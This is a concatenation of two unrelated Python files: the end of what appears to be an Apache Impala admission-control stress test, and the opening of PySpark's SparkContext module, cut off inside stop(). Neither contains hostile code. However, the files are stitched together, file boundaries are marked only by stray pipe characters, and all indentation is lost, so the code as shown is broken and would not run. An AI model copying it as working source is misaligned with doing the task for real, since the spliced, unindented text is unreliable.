LOG.debug("Attempt to clean up thread executing query %s (state %s)",
thread.query_num, thread.query_state)
client = thread.impalad.service.create_beeswax_client()
try:
client.cancel(thread.query_handle)
finally:
client.close()
finally:
thread.lock.release()
# Wait for all threads to exit
for thread in self.all_threads:
thread.join(5)
LOG.debug("Join thread for query num %s %s", thread.query_num,
"TIMED OUT" if thread.isAlive() else "")
def get_ac_processes(self):
"""Returns a list of all Processes which may be used to perform admission control. If
round-robin submission is not being used, only the first Process in this list will
perform admission control."""
return self.cluster.impalads
def get_admission_metrics(self):
"""
Returns a map of the admission metrics, aggregated across all of the impalads.
The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued',
'rejected', 'released', and 'timed-out'.
"""
metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected': 0,
'released': 0, 'timed-out': 0}
for impalad in self.ac_processes:
keys = [metric_key(self.pool_name, 'total-%s' % short_name)
for short_name in metrics.keys()]
values = impalad.service.get_metric_values(keys, [0] * len(keys))
for short_name, value in zip(metrics.keys(), values):
metrics[short_name] += value
return metrics
def get_consistent_admission_metrics(self, num_submitted):
"""Same as get_admission_metrics() except retries until it gets consistent metrics for
num_submitted queries. See IMPALA-6227 for an example of problems with inconsistent
metrics where a dequeued query is reflected in dequeued but not admitted."""
ATTEMPTS = 5
for i in xrange(ATTEMPTS):
metrics = self.get_admission_metrics()
admitted_immediately = num_submitted - metrics['queued'] - metrics['rejected']
if admitted_immediately + metrics['dequeued'] == metrics['admitted']:
return metrics
LOG.info("Got inconsistent metrics {0}".format(metrics))
assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\
"{2}".format(num_submitted, ATTEMPTS, metrics)
def wait_for_metric_changes(self, metric_names, initial, expected_delta):
"""
Waits for the sum of metrics in metric_names to change by at least expected_delta.
This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
metrics aggregated across all impalads, e.g. we want to wait for the total number of
admitted, queued, and rejected metrics to change some amount in total, but we don't
know exactly how the metrics will change individually.
'metric_names' is a list of the keys returned by get_admission_metrics() which are
expected to change.
'initial' is the initial set of metrics returned by get_admission_metrics() to
compare against.
'expected_delta' is the total change expected across all impalads for the specified
metrics.
"""
log_metrics("wait_for_metric_changes, initial=", initial)
current = initial
start_time = time()
while True:
current = self.get_admission_metrics()
log_metrics("wait_for_metric_changes, current=", current)
deltas = compute_metric_deltas(current, initial)
delta_sum = sum([deltas[x] for x in metric_names])
LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",
delta_sum, deltas, expected_delta, metric_names)
if delta_sum >= expected_delta:
LOG.info("Found all %s metrics after %s seconds", delta_sum,
round(time() - start_time, 1))
return (deltas, current)
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting {0} seconds for metrics {1} delta {2} "\
"current {3} initial {4}" .format(
STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current),
str(initial))
sleep(1)
def wait_for_statestore_updates(self, heartbeats):
"""Waits for a number of admission control statestore updates from all impalads."""
start_time = time()
init = dict()
curr = dict()
for impalad in self.impalads:
init[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
curr[impalad] = init[impalad]
while True:
LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(),
init.values(), [curr[i] - init[i] for i in self.impalads])
if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
for impalad in self.impalads:
curr[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,)
sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000))
LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads):
"""
Wait for query submission threads to update after being admitted, as determined
by observing metric changes. This is necessary because the metrics may change
before the execute_async() calls on the query threads return and add themselves
to self.executing_threads.
"""
start_time = time()
LOG.info("Waiting for %s threads to begin execution", num_threads)
# All individual list operations are thread-safe, so we don't need to use a
# lock to synchronize before checking the list length (on which another thread
# may call append() concurrently).
while len(self.executing_threads) < num_threads:
assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
"%s admitted client rpcs to return. Only %s executing " % (
STRESS_TIMEOUT, num_threads, len(self.executing_threads)))
sleep(0.1)
LOG.info("Found all %s admitted threads after %s seconds", num_threads,
round(time() - start_time, 1))
def end_admitted_queries(self, num_queries):
"""
Requests each admitted query to end its query.
"""
assert len(self.executing_threads) >= num_queries
LOG.info("Requesting {0} clients to end queries".format(num_queries))
# Request admitted clients to end their queries
current_executing_queries = []
for i in xrange(num_queries):
# pop() is thread-safe, it's OK if another thread is appending concurrently.
thread = self.executing_threads.pop(0)
LOG.info("Cancelling query %s", thread.query_num)
assert thread.query_state == 'ADMITTED'
current_executing_queries.append(thread)
thread.query_state = 'REQUEST_QUERY_END'
# Wait for the queries to end
start_time = time()
while True:
all_done = True
for thread in self.all_threads:
if thread.query_state == 'REQUEST_QUERY_END':
all_done = False
if all_done:
break
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,)
sleep(1)
class SubmitQueryThread(threading.Thread):
def __init__(self, impalad, additional_query_options, vector, query_num,
query_end_behavior, executing_threads):
"""
executing_threads must be provided so that this thread can add itself when the
query is admitted and begins execution.
"""
super(self.__class__, self).__init__()
self.executing_threads = executing_threads
self.vector = vector
self.additional_query_options = additional_query_options
self.query_num = query_num
self.query_end_behavior = query_end_behavior
self.impalad = impalad
self.error = None
# query_state is defined and used only by the test code, not a property exposed by
# the server
self.query_state = 'NOT_SUBMITTED'
# lock protects query_handle and shutdown, used by the main thread in teardown()
self.lock = threading.RLock()
self.query_handle = None
self.shutdown = False # Set by the main thread when tearing down
self.setDaemon(True)
def run(self):
client = None
try:
try:
# Take the lock while query_handle is being created to avoid an unlikely race
# condition with teardown() (i.e. if an error occurs on the main thread), and
# check if the test is already shut down.
self.lock.acquire()
if self.shutdown:
return
exec_options = self.vector.get_value('exec_option')
exec_options.update(self.additional_query_options)
# Turning off result spooling allows us to better control query execution by
# controlling the number or rows fetched. This allows us to maintain resource
# usage among backends.
exec_options['spool_query_results'] = 0
query = QUERY.format(self.query_num)
self.query_state = 'SUBMITTING'
client = self.impalad.service.create_beeswax_client()
ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
client.set_configuration(exec_options)
if self.query_end_behavior == 'QUERY_TIMEOUT':
client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S))
LOG.info("Submitting query %s", self.query_num)
self.query_handle = client.execute_async(query)
client.wait_for_admission_control(self.query_handle)
admission_result = client.get_admission_result(self.query_handle)
assert len(admission_result) > 0
if "Rejected" in admission_result:
LOG.info("Rejected query %s", self.query_num)
self.query_state = 'REJECTED'
self.query_handle = None
return
elif "Timed out" in admission_result:
LOG.info("Query %s timed out", self.query_num)
self.query_state = 'TIMED OUT'
self.query_handle = None
return
LOG.info("Admission result for query %s : %s", self.query_num, admission_result)
except ImpalaBeeswaxException as e:
LOG.exception(e)
raise e
finally:
self.lock.release()
LOG.info("Admitted query %s", self.query_num)
self.query_state = 'ADMITTED'
# The thread becomes visible to the main thread when it is added to the
# shared list of executing_threads. append() is atomic and thread-safe.
self.executing_threads.append(self)
# Synchronize with the main thread. At this point, the thread is executing a
# query. It needs to wait until the main thread requests it to end its query.
while not self.shutdown:
# The QUERY_TIMEOUT needs to stay active until the main thread requests it
# to end. Otherwise, the query may get cancelled early. Fetch rows 2 times
# per QUERY_TIMEOUT interval to keep the query active.
if self.query_end_behavior == 'QUERY_TIMEOUT' and \
self.query_state != 'COMPLETED':
fetch_result = client.fetch(query, self.query_handle, 1)
assert len(fetch_result.data) == 1, str(fetch_result)
if self.query_state == 'REQUEST_QUERY_END':
self._end_query(client, query)
# The query has released admission control resources
self.query_state = 'COMPLETED'
self.query_handle = None
sleep(QUERY_END_TIMEOUT_S / 6)
except Exception as e:
LOG.exception(e)
# Unknown errors will be raised later
self.error = e
self.query_state = 'ERROR'
finally:
LOG.info("Thread terminating in state=%s", self.query_state)
if client is not None:
try:
self.lock.acquire()
client.close()
# Closing the client closes the query as well
self.query_handle = None
finally:
self.lock.release()
def _end_query(self, client, query):
"""Bring the query to the appropriate end state defined by self.query_end_behaviour.
Returns once the query has reached that state."""
LOG.info("Ending query %s by %s",
str(self.query_handle.get_handle()), self.query_end_behavior)
if self.query_end_behavior == 'QUERY_TIMEOUT':
# Sleep and wait for the query to be cancelled. The cancellation will
# set the state to EXCEPTION.
start_time = time()
while (client.get_state(self.query_handle) !=
client.QUERY_STATES['EXCEPTION']):
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,)
sleep(1)
elif self.query_end_behavior == 'EOS':
# Fetch all rows so we hit eos.
client.fetch(query, self.query_handle)
elif self.query_end_behavior == 'CLIENT_CANCEL':
client.cancel(self.query_handle)
else:
assert self.query_end_behavior == 'CLIENT_CLOSE'
client.close_query(self.query_handle)
def _check_queries_page_resource_pools(self):
"""Checks that all queries in the '/queries' webpage json have the correct resource
pool (this is called after all queries have been admitted, queued, or rejected, so
they should already have the pool set), or no pool for queries that don't go through
admission control."""
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in itertools.chain(queries_json['in_flight_queries'],
queries_json['completed_queries']):
if query['stmt_type'] == 'QUERY' or query['stmt_type'] == 'DML':
assert query['last_event'] != 'Registered' and \
query['last_event'] != 'Planning finished'
assert query['resource_pool'] == self.pool_name
else:
assert query['resource_pool'] == ''
def _get_queries_page_num_queued(self):
"""Returns the number of queries currently in the 'queued' state from the '/queries'
webpage json"""
num_queued = 0
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in queries_json['in_flight_queries']:
if query['last_event'] == 'Queued':
num_queued += 1
return num_queued
def wait_on_queries_page_num_queued(self, min_queued, max_queued):
start_time = time()
LOG.info("Waiting for %s <= queued queries <= %s" % (min_queued, max_queued))
actual_queued = self._get_queries_page_num_queued()
while actual_queued < min_queued or actual_queued > max_queued:
assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
"%s <= queued queries <= %s, %s currently queued.",
STRESS_TIMEOUT, min_queued, max_queued, actual_queued)
sleep(0.1)
actual_queued = self._get_queries_page_num_queued()
LOG.info("Found %s queued queries after %s seconds", actual_queued,
round(time() - start_time, 1))
def run_admission_test(self, vector, additional_query_options):
LOG.info("Starting test case with parameters: %s", vector)
self.impalads = self.cluster.impalads
self.ac_processes = self.get_ac_processes()
round_robin_submission = vector.get_value('round_robin_submission')
submission_delay_ms = vector.get_value('submission_delay_ms')
if not round_robin_submission:
self.impalads = [self.impalads[0]]
self.ac_processes = [self.ac_processes[0]]
num_queries = vector.get_value('num_queries')
assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
initial_metrics = self.get_admission_metrics()
log_metrics("Initial metrics: ", initial_metrics)
for query_num in xrange(num_queries):
impalad = self.impalads[query_num % len(self.impalads)]
query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)]
thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
query_num, query_end_behavior, self.executing_threads)
thread.start()
self.all_threads.append(thread)
sleep(submission_delay_ms / 1000.0)
# Wait for the admission control to make the initial admission decision for all of
# the queries. They should either be admitted immediately, queued, or rejected.
# The test query is chosen that it with remain active on all backends until the test
# ends the query. This prevents queued queries from being dequeued in the background
# without this thread explicitly ending them, so that the test can admit queries in
# discrete waves.
LOG.info("Wait for initial admission decisions")
(metric_deltas, curr_metrics) = self.wait_for_metric_changes(
['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
# Also wait for the test threads that submitted the queries to start executing.
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Check that the admission decisions are reasonable given the test parameters
# The number of admitted and queued requests should be at least the configured limits
# but less than or equal to those limits times the number of impalads.
assert metric_deltas['dequeued'] == 0,\
"Queued queries should not run until others are made to finish"
assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\
"Admitted fewer than expected queries"
assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\
"Admitted more than expected queries: at least one daemon over-admitted"
assert metric_deltas['queued'] >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\
"Should have queued more queries before rejecting them"
assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\
"Queued too many queries: at least one daemon queued too many"
assert metric_deltas['rejected'] + metric_deltas['admitted'] +\
metric_deltas['queued'] == num_queries,\
"Initial admission decisions don't add up to {0}: {1}".format(
num_queries, str(metric_deltas))
initial_metric_deltas = metric_deltas
# Like above, check that the count from the queries webpage json is reasonable.
min_queued = min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
max_queued = MAX_NUM_QUEUED_QUERIES * len(self.impalads)
self.wait_on_queries_page_num_queued(min_queued, max_queued)
self._check_queries_page_resource_pools()
# Admit queries in waves until all queries are done. A new wave of admission
# is started by killing some of the running queries.
while len(self.executing_threads) > 0:
curr_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Main loop, curr_metrics: ", curr_metrics)
num_to_end = len(self.executing_threads)
LOG.info("Main loop, will request %s queries to end", num_to_end)
self.end_admitted_queries(num_to_end)
self.wait_for_metric_changes(['released'], curr_metrics, num_to_end)
num_queued_remaining =\
curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
(metric_deltas, _) = self.wait_for_metric_changes(
['admitted', 'timed-out'], curr_metrics, expected_admitted)
# The queue timeout is set high for these tests, so we don't expect any queries to
# time out.
assert metric_deltas['admitted'] >= expected_admitted
assert metric_deltas['timed-out'] == 0
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Wait a few topic updates to ensure the admission controllers have reached a steady
# state or we may find an impalad dequeue more requests after we capture metrics.
self.wait_for_statestore_updates(10)
final_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Final metrics: ", final_metrics)
metric_deltas = compute_metric_deltas(final_metrics, initial_metrics)
assert metric_deltas['timed-out'] == 0
if round_robin_submission:
min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] >= min_expected_admitted
assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
assert metric_deltas['admitted'] ==\
initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
assert metric_deltas['queued'] == initial_metric_deltas['queued']
assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
else:
# We shouldn't go over the max number of queries or queue size so we can compute
# the expected number of queries that should have been admitted (which includes the
# number queued as they eventually get admitted as well), queued, and rejected
expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] == expected_admitted
assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
assert metric_deltas['rejected'] == num_queries - expected_admitted
# All queries should be completed by now.
self.wait_on_queries_page_num_queued(0, 0)
self._check_queries_page_resource_pools()
for thread in self.all_threads:
if thread.error is not None:
raise thread.error
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES,
max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_flags(self, vector):
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
self.pool_name = 'default-pool'
# The pool has no mem resources set, so submitting queries with huge mem_limits
# should be fine. This exercises the code that does the per-pool memory
# accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled.
self.run_admission_test(vector, {'request_pool': self.pool_name,
'mem_limit': sys.maxint})
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_configs(self, vector):
self.pool_name = 'root.queueB'
self.run_admission_test(vector, {'request_pool': self.pool_name})
def get_proc_limit(self):
"""Gets the process mem limit as reported by the impalad's mem-tracker metric.
Raises an assertion if not all impalads have the same value."""
limit_metrics = []
for impalad in self.cluster.impalads:
limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit"))
assert limit_metrics[0] == limit_metrics[-1],\
"Not all impalads have the same process limit: %s" % (limit_metrics,)
assert limit_metrics[0] is not None
return limit_metrics[0]
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(
max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES,
pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT,
queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_mem_limit(self, vector):
# Impala may set the proc mem limit lower than we think depending on the overcommit
# settings of the OS. It should be fine to continue anyway.
proc_limit = self.get_proc_limit()
if proc_limit != MEM_TEST_LIMIT:
LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit,
MEM_TEST_LIMIT)
self.pool_name = 'default-pool'
# Each query mem limit (set the query option to override the per-host memory
# estimate) should use a bit less than (total pool mem limit) / #queries so that
# once #queries are running, the total pool mem usage is about at the limit and
# additional incoming requests will be rejected. The actual pool limit on the number
# of running requests is very high so that requests are only queued/rejected due to
# the mem limit.
num_impalads = len(self.cluster.impalads)
query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
self.run_admission_test(vector,
{'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
class TestAdmissionControllerStressWithACService(TestAdmissionControllerStress):
"""Runs all of the tests from TestAdmissionControllerStress but with the second impalad
in the minicluster configured to perform all admission control."""
def get_ac_processes(self):
return [self.cluster.admissiond]
def get_ac_log_name(self):
return "admissiond"
def setup_method(self, method):
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
if 'start_args' not in method.func_dict:
method.func_dict['start_args'] = list()
method.func_dict["start_args"].append("--enable_admission_service")
if "impalad_args" in method.func_dict:
method.func_dict["admissiond_args"] = method.func_dict["impalad_args"]
super(TestAdmissionControllerStress, self).setup_method(method)
|
context.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represent the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
self._accumulatorServer = accumulators._start_update_server()
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
